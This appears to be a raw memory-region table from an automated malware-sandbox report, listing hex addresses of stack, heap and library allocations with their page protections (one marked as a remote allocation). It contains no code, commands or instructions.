stack
page read and write
1AFAD965000
heap
page read and write
7FFD9B836000
trusted library allocation
page read and write
2906F572000
trusted library allocation
page read and write
1C292893000
trusted library allocation
page read and write
7FFD9B8B0000
trusted library allocation
page execute and read and write
20FEBBC0000
heap
page execute and read and write
29B2A50B000
trusted library allocation
page read and write
1208CA30000
heap
page read and write
2216EA06000
heap
page read and write
1311B84F000
heap
page read and write
1B994602000
trusted library allocation
page read and write
2102EA18000
trusted library allocation
page read and write
16E6D8C0000
heap
page read and write
155ACD3A000
trusted library allocation
page read and write
16E6F996000
heap
page execute and read and write
29B1A9E4000
trusted library allocation
page read and write
E0939FF000
stack
page read and write
20FEA2F0000
trusted library allocation
page read and write
16891BE0000
heap
page read and write
1C280AF4000
heap
page read and write
24E81C72000
trusted library allocation
page read and write
7FFD9BA10000
trusted library allocation
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
2905D554000
heap
page read and write
2216E9C3000
heap
page read and write
21CED910000
heap
page read and write
3A2B000
stack
page read and write
24E81C34000
trusted library allocation
page read and write
165C23B000
stack
page read and write
16891DA0000
heap
page read and write
9ED6F79000
stack
page read and write
7FFD9B816000
trusted library allocation
page read and write
7FFD9B784000
trusted library allocation
page read and write
2216C7E0000
heap
page read and write
168ABBA1000
heap
page read and write
16E0005D000
trusted library allocation
page read and write
7FFD9BAA0000
trusted library allocation
page read and write
1B9945EA000
trusted library allocation
page read and write
23A4A8D0000
trusted library allocation
page read and write
7FFD9B78D000
trusted library allocation
page execute and read and write
7FFD9BA12000
trusted library allocation
page read and write
7FFD9B830000
trusted library allocation
page read and write
1EA3F0AB000
trusted library allocation
page read and write
29B1BD53000
trusted library allocation
page read and write
5B0F3FF000
stack
page read and write
1C280A90000
heap
page readonly
1B9ABFDA000
heap
page read and write
E093C7C000
stack
page read and write
29B1C0BD000
trusted library allocation
page read and write
24E81B7F000
trusted library allocation
page read and write
7FFD9B9F0000
trusted library allocation
page read and write
7FFD9B830000
trusted library allocation
page read and write
D32EA7F000
stack
page read and write
16E6F2D0000
heap
page read and write
445AC4F000
stack
page read and write
1C280898000
heap
page read and write
7FFD9BA40000
trusted library allocation
page read and write
7FFD9B960000
trusted library allocation
page read and write
168ABC18000
heap
page read and write
30AF000
stack
page read and write
7FFD9B9E0000
trusted library allocation
page read and write
29B189FC000
heap
page read and write
20FEBC90000
heap
page read and write
7FFD9B970000
trusted library allocation
page execute and read and write
2102CD68000
heap
page read and write
29B32923000
heap
page read and write
F5E1FB000
stack
page read and write
2102ED9E000
trusted library allocation
page read and write
7FFD9BA50000
trusted library allocation
page read and write
7FFD9BA10000
trusted library allocation
page read and write
7FFD9BA70000
trusted library allocation
page read and write
7FFD9BA60000
trusted library allocation
page read and write
B51DC3B000
stack
page read and write
29B1B3E4000
trusted library allocation
page read and write
7FFD9B764000
trusted library allocation
page read and write
2216E9A2000
heap
page read and write
7FFD9B93F000
trusted library allocation
page read and write
20FEC1C1000
heap
page read and write
1B994661000
trusted library allocation
page read and write
1C29AB30000
heap
page read and write
155C5119000
heap
page read and write
2102CDBC000
heap
page read and write
21046C6D000
heap
page read and write
2216C9B0000
heap
page read and write
7FFD9B9F0000
trusted library allocation
page read and write
7FFD9BA40000
trusted library allocation
page read and write
9ED6932000
stack
page read and write
7FFD9B7EC000
trusted library allocation
page execute and read and write
1208E710000
heap
page execute and read and write
155ACD70000
trusted library allocation
page read and write
21CEFAAB000
heap
page read and write
7FFD9B9B9000
trusted library allocation
page read and write
7FFD9BA30000
trusted library allocation
page read and write
7FFD9B9AE000
trusted library allocation
page read and write
2216E9B2000
heap
page read and write
7FFD9B960000
trusted library allocation
page execute and read and write
23A52F70000
heap
page read and write
29B1A998000
trusted library allocation
page read and write
332F000
stack
page read and write
7FFD9B846000
trusted library allocation
page read and write
293CD4F000
unkown
page read and write
C7B537000
stack
page read and write
1311B5E0000
heap
page read and write
23A38D20000
heap
page read and write
7FFD9BA60000
trusted library allocation
page read and write
1AFAF913000
heap
page read and write
2216C839000
heap
page read and write
155AD300000
trusted library allocation
page read and write
7FFD9B8B0000
trusted library allocation
page execute and read and write
7FFD9B7AB000
trusted library allocation
page read and write
23A3B040000
trusted library allocation
page read and write
155ACC31000
trusted library allocation
page read and write
24E99D40000
heap
page read and write
7FFD9B80C000
trusted library allocation
page execute and read and write
23A52D00000
heap
page read and write
1311B79C000
heap
page read and write
16E6F350000
heap
page read and write
1AFAD620000
heap
page read and write
16891D20000
heap
page read and write
D22B0FF000
stack
page read and write
29B2A4FF000
trusted library allocation
page read and write
21CEF831000
heap
page read and write
1311B900000
heap
page read and write
1AFAF5A1000
heap
page read and write
29B32A30000
trusted library section
page read and write
24E99F13000
heap
page read and write
7FFD9BA10000
trusted library allocation
page read and write
C7B63C000
stack
page read and write
20FEC48F000
heap
page read and write
2102CDE8000
heap
page read and write
29B18990000
heap
page read and write
1E09EFE000
stack
page read and write
29B1A460000
heap
page execute and read and write
20FEA310000
trusted library allocation
page read and write
1C282868000
trusted library allocation
page read and write
7FFD9B820000
trusted library allocation
page read and write
7FFD9BAB0000
trusted library allocation
page read and write
1C2808ED000
heap
page read and write
7FFD9BA60000
trusted library allocation
page read and write
168952A4000
trusted library allocation
page read and write
168ABEFA000
heap
page read and write
1B991F20000
heap
page read and write
2216E9F4000
heap
page read and write
1C29AB37000
heap
page read and write
7FFD9BA50000
trusted library allocation
page read and write
1208EB18000
trusted library allocation
page read and write
C7B4BE000
stack
page read and write
1209E751000
trusted library allocation
page read and write
120A6C24000
heap
page read and write
2102CD7E000
heap
page read and write
1208E851000
trusted library allocation
page read and write
7FFD9B952000
trusted library allocation
page read and write
7FFD9BA10000
trusted library allocation
page read and write
7FFD9B901000
trusted library allocation
page read and write
1208CC70000
heap
page read and write
1EA3ECA5000
heap
page read and write
24EFFB6A000
heap
page read and write
131357CD000
heap
page read and write
23A5300D000
heap
page read and write
1DBF8080000
heap
page read and write
7FFD9B940000
trusted library allocation
page execute and read and write
1AFAF914000
heap
page read and write
16E6F3F0000
heap
page execute and read and write
7FFD9BA70000
trusted library allocation
page read and write
4459CFD000
stack
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
16891E30000
trusted library allocation
page read and write
16E6F9EC000
heap
page read and write
2409B3A0000
heap
page read and write
20FEA11B000
heap
page read and write
5B0F4FF000
stack
page read and write
1B991F60000
trusted library allocation
page read and write
E5F80FE000
stack
page read and write
7FFD9B970000
trusted library allocation
page execute and read and write
1AFAF97D000
heap
page read and write
7FFD9B940000
trusted library allocation
page execute and read and write
1B991FE0000
heap
page read and write
7FFD9B780000
trusted library allocation
page read and write
16893720000
trusted library allocation
page read and write
1208E7D7000
trusted library allocation
page read and write
120A6B7E000
heap
page read and write
1208E847000
trusted library allocation
page read and write
7FFD9B9D0000
trusted library allocation
page read and write
2102F2BB000
trusted library allocation
page read and write
7FFD9B79D000
trusted library allocation
page execute and read and write
1EA3EB80000
heap
page readonly
1208CAFC000
heap
page read and write
1210000
heap
page read and write
2216E9A0000
heap
page read and write
16891DB5000
heap
page read and write
16E00432000
trusted library allocation
page read and write
120A6B9A000
heap
page read and write
BB44F63000
stack
page read and write
7FFD9B911000
trusted library allocation
page read and write
2102CEA0000
heap
page read and write
23A38E04000
heap
page read and write
1AFAD960000
heap
page read and write
23A3B5B7000
trusted library allocation
page read and write
7FFD9B990000
trusted library allocation
page read and write
1B991CD0000
heap
page read and write
2103E930000
trusted library allocation
page read and write
155ACC20000
heap
page read and write
1C29AB40000
heap
page read and write
155ACD37000
trusted library allocation
page read and write
155C5127000
heap
page read and write
1B991C50000
heap
page read and write
24099970000
heap
page read and write
155C5121000
heap
page read and write
7FFD9B876000
trusted library allocation
page execute and read and write
E5F77C9000
stack
page read and write
168A36B0000
trusted library allocation
page read and write
29B1BE64000
trusted library allocation
page read and write
7FFD9B932000
trusted library allocation
page read and write
2102ED8A000
trusted library allocation
page read and write
20FEBCC0000
heap
page read and write
7FFD9B972000
trusted library allocation
page read and write
155AD2E2000
trusted library allocation
page read and write
7FFD9B790000
trusted library allocation
page read and write
20FEA2A0000
heap
page read and write
F5DC7E000
stack
page read and write
29060FFB000
trusted library allocation
page read and write
7FFD9BA80000
trusted library allocation
page read and write
7FFD9B810000
trusted library allocation
page read and write
1AFAF712000
heap
page read and write
155AB161000
heap
page read and write
7FFD9B9D0000
trusted library allocation
page read and write
5E0000
heap
page read and write
1310000
heap
page read and write
7FFD9B980000
trusted library allocation
page read and write
7FFD9B77D000
trusted library allocation
page execute and read and write
1EA3F35A000
trusted library allocation
page read and write
1208E8A8000
trusted library allocation
page read and write
16891CE0000
heap
page read and write
7FFD9B7AC000
trusted library allocation
page execute and read and write
84FB6FE000
stack
page read and write
155ACC53000
trusted library allocation
page read and write
C7B27D000
stack
page read and write
7FFD9BA30000
trusted library allocation
page read and write
29B1BCF3000
trusted library allocation
page read and write
7FFD9B980000
trusted library allocation
page read and write
7FFD9BA60000
trusted library allocation
page read and write
7FFD9B836000
trusted library allocation
page execute and read and write
1B993911000
trusted library allocation
page read and write
7FFD9B820000
trusted library allocation
page execute and read and write
7FFD9B83C000
trusted library allocation
page execute and read and write
7FFD9B9B0000
trusted library allocation
page read and write
7FFD9BA5E000
trusted library allocation
page read and write
1EA57590000
heap
page read and write
1311DA1B000
trusted library allocation
page read and write
155C50D4000
heap
page read and write
7FFD9B940000
trusted library allocation
page execute and read and write
29B1A99C000
trusted library allocation
page read and write
1AFAF250000
heap
page read and write
7FFD9B820000
trusted library allocation
page read and write
1C280B50000
heap
page read and write
7FFD9B75D000
trusted library allocation
page execute and read and write
1EA3EF90000
heap
page execute and read and write
24E81BA6000
trusted library allocation
page read and write
29B32BC0000
heap
page read and write
1208CCE0000
heap
page readonly
7FFD9BA90000
trusted library allocation
page read and write
4C0000
heap
page read and write
471000
remote allocation
page execute and read and write
168ABC46000
heap
page read and write
7FFD9B9F0000
trusted library allocation
page read and write
9ED6D7D000
stack
page read and write
24E99D37000
heap
page execute and read and write
1311B890000
heap
page readonly
29077494000
heap
page read and write
A053FB000
stack
page read and write
7FFD9B945000
trusted library allocation
page read and write
1C2808CD000
heap
page read and write
16891AE0000
heap
page read and write
2FAF000
stack
page read and write
7FFD9B90A000
trusted library allocation
page read and write
1311D4B8000
trusted library allocation
page read and write
7FFD9B9E0000
trusted library allocation
page read and write
2905D64A000
heap
page read and write
595264E000
stack
page read and write
131357C7000
heap
page read and write
16E0003E000
trusted library allocation
page read and write
1311B8A0000
trusted library allocation
page read and write
1208CAEA000
heap
page read and write
1B994604000
trusted library allocation
page read and write
24E99EA1000
heap
page read and write
1B993CA1000
trusted library allocation
page read and write
1EA3EB70000
trusted library allocation
page read and write
1EA3EDD0000
heap
page read and write
1208E84A000
trusted library allocation
page read and write
24EFFB4E000
heap
page read and write
23A4A861000
trusted library allocation
page read and write
21CEF79D000
heap
page read and write
A047EA000
stack
page read and write
7FFD9BA90000
trusted library allocation
page read and write
2103E921000
trusted library allocation
page read and write
1EA3D150000
heap
page read and write
23A38DA6000
heap
page read and write
7FFD9BA3C000
trusted library allocation
page read and write
7FFD9B826000
trusted library allocation
page read and write
C7B7BE000
stack
page read and write
7FFD9B763000
trusted library allocation
page execute and read and write
7FFD9B980000
trusted library allocation
page read and write
2216E631000
heap
page read and write
7FFD9BA10000
trusted library allocation
page read and write
1E09D7E000
stack
page read and write
16E000FC000
trusted library allocation
page read and write
21CEFAB2000
heap
page read and write
1EA3ECA0000
heap
page read and write
24099880000
heap
page read and write
7FFD9B806000
trusted library allocation
page read and write
7FFD9B76B000
trusted library allocation
page read and write
21CEFAAA000
heap
page read and write
16891BC0000
heap
page read and write
29077610000
heap
page read and write
7FFD9B990000
trusted library allocation
page read and write
2216E9A8000
heap
page read and write
7FFD9B9D0000
trusted library allocation
page read and write
24E81B31000
trusted library allocation
page read and write
1B9943B0000
trusted library allocation
page read and write
1AFAF93C000
heap
page read and write
290775F0000
heap
page read and write
2907750F000
heap
page read and write
23A52F8C000
heap
page read and write
B51DB37000
stack
page read and write
1B993DE6000
trusted library allocation
page read and write
23A3ACF4000
trusted library allocation
page read and write
29B1BAC2000
trusted library allocation
page read and write
84FB7FC000
stack
page read and write
29B1BCD9000
trusted library allocation
page read and write
23A52E67000
heap
page execute and read and write
1C29A927000
heap
page execute and read and write
1C29A890000
heap
page execute and read and write
24EFFAF0000
heap
page read and write
155C52D6000
heap
page read and write
21047110000
heap
page read and write
7FFD9BA80000
trusted library allocation
page read and write
7FFD9B764000
trusted library allocation
page read and write
53E10FF000
stack
page read and write
7FFD9B820000
trusted library allocation
page execute and read and write
1C29A9E9000
heap
page read and write
24EFFB72000
heap
page read and write
1E09DFD000
stack
page read and write
29B1A50E000
trusted library allocation
page read and write
2906F43C000
trusted library allocation
page read and write
16E6F960000
heap
page execute and read and write
1208CB91000
heap
page read and write
1311DA50000
trusted library allocation
page read and write
155AAFC0000
heap
page read and write
7FFD9B880000
trusted library allocation
page execute and read and write
7FFD9B754000
trusted library allocation
page read and write
20FEC1D7000
heap
page read and write
1B994644000
trusted library allocation
page read and write
16891D80000
trusted library allocation
page read and write
16E6D94E000
heap
page read and write
16E00C04000
trusted library allocation
page read and write
7FFD9B836000
trusted library allocation
page read and write
7FFD9B780000
trusted library allocation
page read and write
29B189EE000
heap
page read and write
There are 2052 hidden memdumps, click here to show them.